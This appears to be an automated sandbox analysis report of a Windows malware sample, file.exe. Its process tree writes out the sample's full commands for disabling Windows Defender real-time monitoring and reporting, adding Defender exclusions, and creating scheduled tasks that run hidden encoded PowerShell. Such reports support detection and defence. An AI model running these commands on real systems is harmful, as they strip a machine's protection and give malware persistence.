Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03-10-2022 07:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2b9f7e62a158f46bbd476a09f6309c99
-
SHA1
53ca5afbe82b5b577b8d754d0b0248b02dfe1776
-
SHA256
28d501fd312d71c533498aa5d35e408b68820206ffd34dce7c38018fd5e4f34d
-
SHA512
2e9ce5a4d0f7dee3491365105103d830918d670ce924e8314441bfaeb44277bb745d96c0dfc3378c933247111d3dd94a2bddb47a5e3f1bb03f093a6e44bb9b48
-
SSDEEP
196608:91OmzwtIA+YzrVJAJ2GgUqONGvjGLMpdAs6vw:3O1uA+YvXAJ2Gg5ONgGMpupvw
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CEEEIGvNcEpIBnVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VnSvEXTIbraTatzTOsR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jIUrjTqJU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nVCmSimpmwUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jIUrjTqJU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twylNxKJekDU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CEEEIGvNcEpIBnVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCMDmHxGrLJHC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCMDmHxGrLJHC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VnSvEXTIbraTatzTOsR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fwhiGQHhSfnZUzkc = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nVCmSimpmwUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\twylNxKJekDU2 = "0" reg.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exeSEcCofr.exepid process 1548 Install.exe 1528 Install.exe 908 SEcCofr.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 1132 file.exe 1548 Install.exe 1548 Install.exe 1548 Install.exe 1548 Install.exe 1528 Install.exe 1528 Install.exe 1528 Install.exe -
Drops file in System32 directory 8 IoCs
Processes:
powershell.EXESEcCofr.exepowershell.EXEpowershell.EXEpowershell.EXEInstall.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SEcCofr.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SEcCofr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SEcCofr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1336 schtasks.exe 316 schtasks.exe 1696 schtasks.exe 1688 schtasks.exe 1452 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEpid process 1908 powershell.EXE 1908 powershell.EXE 1908 powershell.EXE 816 powershell.EXE 816 powershell.EXE 816 powershell.EXE 1592 powershell.EXE 1592 powershell.EXE 1592 powershell.EXE 1624 powershell.EXE 1624 powershell.EXE 1624 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 1908 powershell.EXE Token: SeDebugPrivilege 816 powershell.EXE Token: SeDebugPrivilege 1592 powershell.EXE Token: SeDebugPrivilege 1624 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1132 wrote to memory of 1548 1132 file.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1548 wrote to memory of 1528 1548 Install.exe Install.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 572 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 1528 wrote to memory of 1328 1528 Install.exe forfiles.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 572 wrote to memory of 1708 572 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1328 wrote to memory of 1880 1328 forfiles.exe cmd.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1816 1708 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1880 wrote to memory of 1988 1880 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1336 1708 cmd.exe reg.exe PID 1880 wrote to memory of 920 1880 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXcbmvcRy" /SC once /ST 03:53:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXcbmvcRy"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXcbmvcRy"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe\" d8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {35D01037-5F06-4226-9C68-40DB8321DA55} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {DB9F9B70-F6BB-4928-8BE0-375C74F5BC0E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeC:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exe d8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLITuJqoR" /SC once /ST 06:17:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLITuJqoR"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLITuJqoR"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giQkrcyHx" /SC once /ST 05:30:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giQkrcyHx"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giQkrcyHx"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
